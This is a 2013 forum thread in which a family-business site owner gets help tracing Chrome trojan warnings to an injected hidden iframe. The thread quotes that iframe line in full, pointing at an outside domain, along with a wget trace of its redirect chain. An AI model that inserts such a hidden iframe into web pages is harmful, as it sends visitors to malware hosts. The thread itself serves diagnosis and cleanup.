12 Replies - 365 Views - Last Post: 07 June 2013 - 04:49 PM

#1 L2g2h  Icon User is offline

  • New D.I.C Head

Reputation: 1
  • View blog
  • Posts: 13
  • Joined: 18-May 13

Website help?

Posted 26 May 2013 - 11:25 AM

Long story short, here goes.

I'm working to try to learn website coding so that I could help my family's business with website maintenance as they have been subject to local companies or companies in general charging what they want and making changes that aren't planned for or asked for.

My reason for posting is that they have hired a new company to redesign the website, it's been done and they like it. Difficulty is anytime a customer uses google chrome in the market area (or anywhere really just people in the area seem to use chrome not to mention it has highest share usage out of browsers) there is a google warning about trojans. I called the company for them though they deny any involvement, saying it is our hosting company and we need to fire the current hosting company then go with them.

I know this can't possibly be true as there have only been trojan warnings upon changing the company involved for web design. There was a two week period where there were no warnings about trojans. How do I catch them at their game or more importantly get this removed as in our small market customers are getting upset then calling in to complain or outrage. Help?

Website: www.twincityserviceco.com

Is This A Good Question/Topic? 0
  • +

Replies To: Website help?

#2 modi123_1  Icon User is online

  • Suitor #2
  • member icon



Reputation: 8396
  • View blog
  • Posts: 31,231
  • Joined: 12-June 08

Re: Website help?

Posted 26 May 2013 - 02:23 PM

You need to clean out what ever is on the hosted site (be it actual malware or ads that link to them, and then petition google, etc who are flagging the site that your account is clean.
Was This Post Helpful? 0
  • +
  • -

#3 JackOfAllTrades  Icon User is offline

  • Saucy!
  • member icon

Reputation: 5960
  • View blog
  • Posts: 23,238
  • Joined: 23-August 08

Re: Website help?

Posted 26 May 2013 - 02:24 PM

There is a suspicious iframe at the bottom of your main page pages that LOOKS like it's related to Twitter, but it's not.

This suggests that perhaps someone has access to your account on the host.

This post has been edited by JackOfAllTrades: 26 May 2013 - 02:29 PM
Reason for edit:: Found on other pages too

Was This Post Helpful? 0
  • +
  • -

#4 L2g2h  Icon User is offline

  • New D.I.C Head

Reputation: 1
  • View blog
  • Posts: 13
  • Joined: 18-May 13

Re: Website help?

Posted 26 May 2013 - 04:55 PM

View Postmodi123_1, on 26 May 2013 - 02:23 PM, said:

You need to clean out what ever is on the hosted site (be it actual malware or ads that link to them, and then petition google, etc who are flagging the site that your account is clean.



View PostJackOfAllTrades, on 26 May 2013 - 02:24 PM, said:

There is a suspicious iframe at the bottom of your main page pages that LOOKS like it's related to Twitter, but it's not.

This suggests that perhaps someone has access to your account on the host.


Thank you both very much, confirms that there is something way wrong here. I look at the page(s) though I don't see an "iframe" or mention of twitter on the page. When I look into the page source and paste it into wordpad++ I find the following

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://silverleaf-hoa.com/mqbg.html?i=1971425></iframe> 



the code snippet is at the bottom of the page where the body ends. I'm presuming that is what you're talking about JackOfAllTrades ?
Was This Post Helpful? 0
  • +
  • -

#5 JackOfAllTrades  Icon User is offline

  • Saucy!
  • member icon

Reputation: 5960
  • View blog
  • Posts: 23,238
  • Joined: 23-August 08

Re: Website help?

Posted 26 May 2013 - 05:42 PM

Yes, that's it. The good thing is that where it's sending people is currently resulting in a 404:

wget "http://silverleaf-hoa.com/mqbg.html?i=1971425" -O silverleaf.html
--20:40:28--  http://silverleaf-hoa.com/mqbg.html?i=1971425
           => `silverleaf.html'
Resolving silverleaf-hoa.com... 184.154.233.7
Connecting to silverleaf-hoa.com|184.154.233.7|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://scl-nielsen.com/mqbg.html?i=1971425 [following]
--20:40:29--  http://scl-nielsen.com/mqbg.html?i=1971425
           => `silverleaf.html'
Resolving scl-nielsen.com... 207.158.54.100
Connecting to scl-nielsen.com|207.158.54.100|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
20:40:29 ERROR 404: Not Found.



I would suggest changing your password and verifying permissions on all files.
Was This Post Helpful? 0
  • +
  • -

#6 L2g2h  Icon User is offline

  • New D.I.C Head

Reputation: 1
  • View blog
  • Posts: 13
  • Joined: 18-May 13

Re: Website help?

Posted 26 May 2013 - 05:44 PM

View PostJackOfAllTrades, on 26 May 2013 - 05:42 PM, said:

Yes, that's it. The good thing is that where it's sending people is currently resulting in a 404:

wget "http://silverleaf-hoa.com/mqbg.html?i=1971425" -O silverleaf.html
--20:40:28--  http://silverleaf-hoa.com/mqbg.html?i=1971425
           => `silverleaf.html'
Resolving silverleaf-hoa.com... 184.154.233.7
Connecting to silverleaf-hoa.com|184.154.233.7|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://scl-nielsen.com/mqbg.html?i=1971425 [following]
--20:40:29--  http://scl-nielsen.com/mqbg.html?i=1971425
           => `silverleaf.html'
Resolving scl-nielsen.com... 207.158.54.100
Connecting to scl-nielsen.com|207.158.54.100|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
20:40:29 ERROR 404: Not Found.



I would suggest changing your password and verifying permissions on all files.


I'm sorry, I don't understand that snippet. Sorry for being less educated on this.

I'm working to change that text on the htmls and changing the ftp infos now.
Was This Post Helpful? 0
  • +
  • -

#7 JackOfAllTrades  Icon User is offline

  • Saucy!
  • member icon

Reputation: 5960
  • View blog
  • Posts: 23,238
  • Joined: 23-August 08

Re: Website help?

Posted 26 May 2013 - 05:55 PM

It means that the request to the first one is redirected to the second, but that fails. The redirection is how this stuff usually works. It bounces from compromised host to compromised host until it finally grabs a malicious binary which installs in the browser of unsuspecting people with poor security settings (usually using Internet Explorer and running under an administrator account).
Was This Post Helpful? 0
  • +
  • -

#8 L2g2h  Icon User is offline

  • New D.I.C Head

Reputation: 1
  • View blog
  • Posts: 13
  • Joined: 18-May 13

Re: Website help?

Posted 26 May 2013 - 06:35 PM

View PostJackOfAllTrades, on 26 May 2013 - 05:55 PM, said:

It means that the request to the first one is redirected to the second, but that fails. The redirection is how this stuff usually works. It bounces from compromised host to compromised host until it finally grabs a malicious binary which installs in the browser of unsuspecting people with poor security settings (usually using Internet Explorer and running under an administrator account).


Thank you. I'm making the changes and will save a before and after folder of the site so I can talk to them next business day they're open and get on the job with my google webmaster tools to see if I can get it recrawled/re-evaluated.

Thanks so much!
Was This Post Helpful? 0
  • +
  • -

#9 L2g2h  Icon User is offline

  • New D.I.C Head

Reputation: 1
  • View blog
  • Posts: 13
  • Joined: 18-May 13

Re: Website help?

Posted 30 May 2013 - 02:42 PM

So I come back here looking for further assistance. Thanks again.

So I found there was a .dwt file in the files that the company uploded, I know enough to know that it's a Dreamweaver Template file so I figured if I am able to access the file, then correct the malicious code out of it I might be in better luck than manually correcting each file. I think there roughly 20-30.

Oh well. I will manually work on correcting the individual files.

I am concerned as to what this error might pertain to. I'm thinking I don't have file permission or some such? I have the information for the overall hosting account and reconfirmed the FTP user account I'm using has full permissions.

Clueless

Anyways here's the error.

There is an error at line 101, column 9 (absolute position 6416) of "C:\Users\(username)\AppData\Roaming\Adobe\Dreamweaver9\Configuration\ServerConnections\TwinCityService\htdocs\TwinCitySrvc\master.dwt":unexpected end-of-file


Was This Post Helpful? 0
  • +
  • -

#10 L2g2h  Icon User is offline

  • New D.I.C Head

Reputation: 1
  • View blog
  • Posts: 13
  • Joined: 18-May 13

Re: Website help?

Posted 30 May 2013 - 02:51 PM

So I come back here looking for further assistance. Thanks again.

So I found there was a .dwt file in the files that the company uploded, I know enough to know that it's a Dreamweaver Template file so I figured if I am able to access the file, then correct the malicious code out of it I might be in better luck than manually correcting each file. I think there roughly 20-30.

Oh well. I will manually work on correcting the individual files.

I am concerned as to what this error might pertain to. I'm thinking I don't have file permission or some such? I have the information for the overall hosting account and reconfirmed the FTP user account I'm using has full permissions.

Clueless

Anyways here's the error.

There is an error at line 101, column 9 (absolute position 6416) of "C:\Users\(username)\AppData\Roaming\Adobe\Dreamweaver9\Configuration\ServerConnections\TwinCityService\htdocs\TwinCitySrvc\master.dwt":unexpected end-of-file



So I come back here looking for further assistance. Thanks again.

So I found there was a .dwt file in the files that the company uploded, I know enough to know that it's a Dreamweaver Template file so I figured if I am able to access the file, then correct the malicious code out of it I might be in better luck than manually correcting each file. I think there roughly 20-30.

Oh well. I will manually work on correcting the individual files.

I am concerned as to what this error might pertain to. I'm thinking I don't have file permission or some such? I have the information for the overall hosting account and reconfirmed the FTP user account I'm using has full permissions.

Clueless

Anyways here's the error.

There is an error at line 101, column 9 (absolute position 6416) of "C:\Users\(username)\AppData\Roaming\Adobe\Dreamweaver9\Configuration\ServerConnections\TwinCityService\htdocs\TwinCitySrvc\master.dwt":unexpected end-of-file


Was This Post Helpful? 0
  • +
  • -

#11 JackOfAllTrades  Icon User is offline

  • Saucy!
  • member icon

Reputation: 5960
  • View blog
  • Posts: 23,238
  • Joined: 23-August 08

Re: Website help?

Posted 31 May 2013 - 03:04 AM

I don't know what the DW template file looks like (IMO, DW is for people who don't really know how to code), so it's hard to say exactly. Something is missing that indicates to whatever is reading that file that the file has ended.
Was This Post Helpful? 0
  • +
  • -

#12 L2g2h  Icon User is offline

  • New D.I.C Head

Reputation: 1
  • View blog
  • Posts: 13
  • Joined: 18-May 13

Re: Website help?

Posted 07 June 2013 - 04:20 PM

Thank you again, especially JackOfAllTrades for all the assistance.

I have another issue with the site! Difficulty being I'm trying to narrow down what is causing this issue. I have included the email I got from Google Webmaster Tools on 6.6.13 1:39AM. On 6.5.13 my family's small town business gave a new FTP user id and pw to the contracted website company as while I was editing out the previous issue I changed the credentials they had.

Message summary

Webmaster Tools sent you the following important messages about sites in your account. To keep your site healthy, we recommend regularly reviewing these messages and addressing any critical issues.

Notice of Suspected Hacking on http://www.twincityserviceco.com/

Dear site owner or webmaster of http://www.twincityserviceco.com/,

We are writing to let you know that we believe some of your website's pages may be hacked. Specifically, we think that Javascript has been injected into your site by a third party and may be used to redirect users to malicious sites. You should check your source code for any unfamiliar Javascript and in particular any files containing "iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 ". The malicious code may be placed in HTML, Javascript or PHP files so it's important to be thorough in your search.

The following are example URLs from your site where we found such content:

http://www.twincityserviceco.com/
http://www.twincityserviceco.com/faq-hvac.html
http://www.twincityserviceco.com/get-estimate.html
In addition, it's also possible your server configuration files (such as Apache's .htaccess) have been compromised. As a result of this, your site may be cloaking and showing the malicious content only in certain situations.

We encourage you to investigate this matter in order to protect your visitors. If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but also to identify and fix the vulnerability. A good first step may be to contact your web host's technical support for assistance. It's also important to make sure that your website's software is up-to-date with the latest security updates and patches.

More information about cleaning your site can be found at:

http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163634

Sincerely, Google Search Quality Team


Below I included the short email the contracted company sent us.

Hi William,
 
We are seeing the same iFrame problem.  There is nothing in our code that would create this, so it must still be Malware on the server.  This is not something that Network Solutions would install.  Malware was previously on your server.  We thought we had it all removed when we updated your site, but there must still be something left.  
 
When we tried to get into your server, it told us that the username and password had changed.  We will need the updated FTP username and password to get back in and remove the current Malware problem.  Can you provide that for me?
 
Thank you!
Rob



How might I distinguish if files on the ftp server are indeed malicious or not?
Was This Post Helpful? 0
  • +
  • -

#13 andrewsw  Icon User is online

  • Fire giant boob nipple gun!
  • member icon

Reputation: 2890
  • View blog
  • Posts: 9,597
  • Joined: 12-December 12

Re: Website help?

Posted 07 June 2013 - 04:49 PM

Why not let Rob do the sweeping for you?
Was This Post Helpful? 0
  • +
  • -

Page 1 of 1